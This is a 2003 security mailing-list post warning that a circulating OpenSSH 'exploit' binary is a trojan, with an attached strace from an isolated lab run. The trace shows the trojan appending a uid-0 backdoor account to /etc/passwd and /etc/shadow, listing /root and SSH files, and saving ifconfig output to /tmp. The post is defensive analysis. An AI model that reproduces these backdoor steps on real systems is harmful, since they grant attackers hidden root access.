Lars, What you say is true. For those of you who are interested attached is an strace of this bogus exploit that I ran in my lab on disposable systems in captive network. Note, on the parent PID file I edited out quite a bit of repetitive bogus wait statements, no sense in filling your mailboxes with 400k lines of crap. ... Chris On Fri, 2003-09-19 at 03:07, Lars Olsson wrote: > On Fri, 19 Sep 2003, Vitaly Osipov wrote: > > > This means that the original poster (gordon last) made it up himself, > > because he is saying : > > > > >> > i looked at this piece of exploit... it is binary so i'am not sure if > > >> > this is a trojan or a backdoor or a virus. but i can't see anything > > >> > strange while sniffing the exploit traffic. and i got root on serveral > > >> > of my openbsd boxes with that. the bruteforcer seems to be very good. > > > > which is obviously not true. Btw as far as I understand, the troyan code is > > triggered when > > the "exploit" is run with the offset specified, and not in a "bruteforcing" > > mode. > > > > The trojan seems to be triggered in both cases, providing that the > "bruteforcing" terminates. I haven't test run the code but I did a very > quick reverse of the binary. It connects to the remote sshd but only > sends the key used for descrmbling the trojan code while it pretends > to search for offsets. > > > /Lars -- Christopher Neitzert http://www.neitzert.com/~chris
execve("./theosshucksass", ["./theosshucksass", "192.168.0.34"], [/* 20 vars
*/]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0) = 0x804a450
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40017000
close(3) = 0
open("/lib/tls/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(3) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575,
seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0,
useable:1}) = 0
munmap(0x40017000, 31716) = 0
brk(0) = 0x804a450
brk(0x804b450) = 0x804b450
brk(0) = 0x804b450
brk(0x804c000) = 0x804c000
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(4, 1), ...}) = 0
ioctl(1, SNDCTL_TMR_TIMEBASE, {B38400 opost isig icanon echo ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40017000
write(1, "theosshucksass.c - remote openss"..., 59) = 59
write(1, "by raazab/m0nkeyhack@supermarkt."..., 35) = 35
getuid32() = 0
write(1, "\nr00ting box...\n", 16) = 16
write(1, "\thost: 192.168.0.34\n", 20) = 20
write(1, "\toffset: (null)\n\n", 17) = 17
write(1, "[*] building socket\n", 20) = 20
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
write(1, "[*] connecting to victim\n", 25) = 25
connect(3, {sa_family=AF_INET, sin_port=htons(22),
sin_addr=inet_addr("192.168.0.34")}, 16) = 0
recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23
write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32
write(1, "\n", 1) = 1
write(1, "[*] no offset given: brute force"..., 63) = 63
write(1, "\tTrying 0xe56ac71c\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac720\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac724\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac728\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac72c\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac730\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac734\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac738\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-/\n", 4) = 4
write(1, "\tTrying 0xe56ac73c\t", 19) = 19
write(3, "gdfea#\0", 7) = 7
write(1, ":-)\n", 4) = 4
write(1, "[*] Gotcha!\n", 12) = 12
write(1, "[*] reconnecting \n", 18) = 18
close(3) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
write(1, "[*] connecting to victim\n", 25) = 25
connect(3, {sa_family=AF_INET, sin_port=htons(22),
sin_addr=inet_addr("192.168.0.34")}, 16) = 0
recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23
write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32
write(1, "\n", 1) = 1
write(1, "[*] calculating nops\n", 21) = 21
write(1, "[*] sending nops\n", 17) = 17
write(3, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 23) = 23
write(1, "[*] sending shellcode\n", 22) = 22
pipe([4, 5]) = 0
vfork() = 1062
close(5) = 0
write(3, "\210", 1) = 1
write(1, "[*] trying to spawn remote shell"..., 47)
= 47
write(3, "gdfea#", 6) = 6
write(1, "[*] closing socket\n\n", 20) = 20
close(3) = 0
write(1, "all seems fine... try to connect"..., 63) = 63
munmap(0x40017000, 4096) = 0
exit_group(0) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
close(4) = 0
dup2(5, 1) = 1
close(5) = 0
execve("/bin/sh", ["sh", "-c", "(echo \"sys3:x:0:103::/:/bin/sh\" "...], [/* 20
vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0) = 0x80e5b54
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4) = 0
open("/lib/libtermcap.so.2", O_RDONLY) = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\r\0"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=11784, ...}) = 0
old_mmap(NULL, 14856, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4001f000
old_mmap(0x40022000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4,
0x2000) = 0x40022000
close(4) = 0
open("/lib/libdl.so.2", O_RDONLY) = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=15900, ...}) = 0
old_mmap(NULL, 13176, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40023000
old_mmap(0x40026000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4,
0x2000) = 0x40026000
close(4) = 0
open("/lib/tls/libc.so.6", O_RDONLY) = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4,
0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40027000
set_thread_area({entry_number:-1 -> 6, base_addr:0x40027660, limit:1048575,
seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0,
useable:1}) = 0
munmap(0x40017000, 31716) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = 4
close(4) = 0
brk(0) = 0x80e5b54
brk(0) = 0x80e5b54
brk(0x80e6000) = 0x80e6000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40028000
close(4) = 0
brk(0) = 0x80e6000
brk(0x80e7000) = 0x80e7000
brk(0) = 0x80e7000
brk(0x80e8000) = 0x80e8000
getuid32() = 0
getgid32() = 0
geteuid32() = 0
getegid32() = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
brk(0) = 0x80e8000
brk(0x80e9000) = 0x80e9000
time(NULL) = 1063931038
brk(0) = 0x80e9000
brk(0x80ea000) = 0x80ea000
open("/etc/mtab", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=264, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40017000
read(4, "/dev/hdb2 / ext3 rw 0 0\nnone /pr"..., 4096) = 264
close(4) = 0
munmap(0x40017000, 4096) = 0
open("/proc/meminfo", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40017000
read(4, " total: used: free:"..., 1024) = 653
close(4) = 0
munmap(0x40017000, 4096) = 0
brk(0) = 0x80ea000
brk(0x80eb000) = 0x80eb000
rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
uname({sys="Linux", node="f00f", ...}) = 0
stat64("/root/theothisisourpresentforyou", {st_mode=S_IFDIR|0700, st_size=4096,
...}) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
getpid() = 1062
getppid() = 1
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory)
stat64("/usr/local/bin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory)
stat64("/sbin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory)
stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0
access("/bin/sh", X_OK) = 0
stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0
access("/bin/sh", X_OK) = 0
getpgrp() = 1060
rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
brk(0) = 0x80eb000
brk(0x80ec000) = 0x80ec000
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0
mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 4, 0) = 0x40017000
close(4) = 0
brk(0) = 0x80ec000
brk(0x80ed000) = 0x80ed000
brk(0) = 0x80ed000
brk(0x80ee000) = 0x80ee000
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11,
<ignored>, <ignored>, 0x400276a8) = 1063
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
wait4(-1, --- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1063
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4
dup2(4, 1) = 1
close(4) = 0
dup2(1, 2) = 2
open("/etc/passwd", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
fcntl64(1, F_GETFD) = 0
fcntl64(1, F_DUPFD, 10) = 10
fcntl64(1, F_GETFD) = 0
fcntl64(10, F_SETFD, FD_CLOEXEC) = 0
dup2(4, 1) = 1
close(4) = 0
write(1, "sys3:x:0:103::/:/bin/sh\n", 24) = 24
dup2(10, 1) = 1
fcntl64(10, F_GETFD) = 0x1 (flags FD_CLOEXEC)
close(10) = 0
open("/etc/shadow", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4
fcntl64(1, F_GETFD) = 0
fcntl64(1, F_DUPFD, 10) = 10
fcntl64(1, F_GETFD) = 0
fcntl64(10, F_SETFD, FD_CLOEXEC) = 0
dup2(4, 1) = 1
close(4) = 0
write(1, "sys3:$1$nWXmkX74$Ws8fX/MFI3.j5HK"..., 59) = 59
dup2(10, 1) = 1
fcntl64(10, F_GETFD) = 0x1 (flags FD_CLOEXEC)
close(10) = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11,
<ignored>, <ignored>, 0x400276a8) = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [],
SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffec34, WNOHANG, NULL) = -1 ECHILD (No child processes)
sigreturn() = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [],
SA_RESTORER, 0x420276f8}, 8) = 0
open("/root/", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 4
fstat64(4, {st_mode=S_IFDIR|0750, st_size=4096, ...}) = 0
fcntl64(4, F_SETFD, FD_CLOEXEC) = 0
brk(0) = 0x80ee000
brk(0x80f0000) = 0x80f0000
getdents64(4, /* 30 entries */, 4096) = 1008
getdents64(4, /* 0 entries */, 4096) = 0
close(4) = 0
stat64("/root/.ssh", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
lstat64("/root/.ssh/known_hosts", {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/cat", 0xbfffeec0) = -1 ENOENT (No such file or
directory)
stat64("/usr/local/bin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory)
stat64("/sbin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory)
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK) = 0
stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0
access("/bin/cat", X_OK) = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11,
<ignored>, <ignored>, 0x400276a8) = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [],
SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1065
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffecd4, WNOHANG, NULL) = -1 ECHILD (No child processes)
sigreturn() = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [],
SA_RESTORER, 0x420276f8}, 8) = 0
stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
stat64("/usr/local/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or
directory)
stat64("/usr/local/bin/find", 0xbfffef60) = -1 ENOENT (No such file or
directory)
stat64("/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or directory)
stat64("/bin/find", 0xbfffef60) = -1 ENOENT (No such file or directory)
stat64("/usr/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or directory)
stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0
access("/usr/bin/find", X_OK) = 0
stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0
access("/usr/bin/find", X_OK) = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11,
<ignored>, <ignored>, 0x400276a8) = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [],
SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 1], 0, NULL) = 1066
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(-1, 0xbfffed74, WNOHANG, NULL) = -1 ECHILD (No child processes)
sigreturn() = ? (mask now [])
rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [],
SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
pipe([4, 5]) = 0
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11,
<ignored>, <ignored>, 0x400276a8) = 1067
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0
close(5) = 0
close(5) = -1 EBADF (Bad file descriptor)
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11,
<ignored>, <ignored>, 0x400276a8) = 1068
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0
close(4) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8) = 0
rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8) = 0
rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [],
SA_RESTORER, 0x420276f8}, 8) = 0
wait4(-1,
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
--- SIGSTOP (Stopped (signal)) @ 0 (0) ---
getpid() = 1064
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0
rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0
open("/tmp/.tmp", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4
dup2(4, 1) = 1
close(4) = 0
execve("/sbin/ifconfig", ["/sbin/ifconfig", "-a"], [/* 19 vars */]) = 0
uname({sys="Linux", node="f00f", ...}) = 0
brk(0) = 0x8055fe8
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40016000
open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0
old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000
close(4) = 0
open("/lib/tls/libc.so.6", O_RDONLY) = 4
read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512
fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0
old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0x42000000
old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4,
0x12f000) = 0x4212f000
old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000
close(4) = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001f000
set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575,
seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0,
useable:1}) = 0
munmap(0x40017000, 31716) = 0
brk(0) = 0x8055fe8
brk(0x8056fe8) = 0x8056fe8
brk(0) = 0x8056fe8
brk(0x8057000) = 0x8057000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4
fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0
mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000
close(4) = 0
uname({sys="Linux", node="f00f", ...}) = 0
access("/proc/net", R_OK) = 0
access("/proc/net/unix", R_OK) = 0
socket(PF_UNIX, SOCK_DGRAM, 0) = 4
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 5
access("/proc/net/if_inet6", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/net/ax25", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/net/nr", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/net/rose", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/net/ipx", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/net/appletalk", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/sys/net/econet", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/sys/net/ash", R_OK) = -1 ENOENT (No such file or directory)
access("/proc/net/x25", R_OK) = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40017000
read(6, "Inter-| Receive "..., 1024) = 569
read(6, "", 1024) = 0
close(6) = 0
munmap(0x40017000, 4096) = 0
open("/usr/share/locale/locale.alias", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40017000
read(6, "# Locale name alias data base.\n#"..., 4096) = 2601
brk(0) = 0x8057000
brk(0x8058000) = 0x8058000
read(6, "", 4096) = 0
close(6) = 0
munmap(0x40017000, 4096) = 0
open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en_US.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en_US/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT
(No such file or directory)
open("/usr/share/locale/en.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1
ENOENT (No such file or directory)
open("/usr/share/locale/en/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No
such file or directory)
ioctl(5, 0x8912, 0xbffff240) = 0
open("/proc/net/dev", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40017000
read(6, "Inter-| Receive "..., 1024) = 569
close(6) = 0
munmap(0x40017000, 4096) = 0
ioctl(5, 0x8913, 0xbffff1e0) = 0
ioctl(5, 0x8927, 0xbffff1e0) = 0
ioctl(5, 0x891d, 0xbffff1e0) = 0
ioctl(5, 0x8921, 0xbffff1e0) = 0
ioctl(5, 0x8970, 0xbffff1e0) = 0
ioctl(5, 0x8970, 0xbffff1e0) = 0
ioctl(5, 0x8942, 0xbffff1e0) = 0
ioctl(5, 0x8915, 0xbffff1e0) = -1 EADDRNOTAVAIL (Cannot assign
requested address)
open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0
mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 6, 0) = 0x40017000
close(6) = 0
fstat64(1, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001d000
open("/proc/net/if_inet6", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/proc/net/dev", O_RDONLY) = 6
fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x4001e000
read(6, "Inter-| Receive "..., 1024) = 569
close(6) = 0
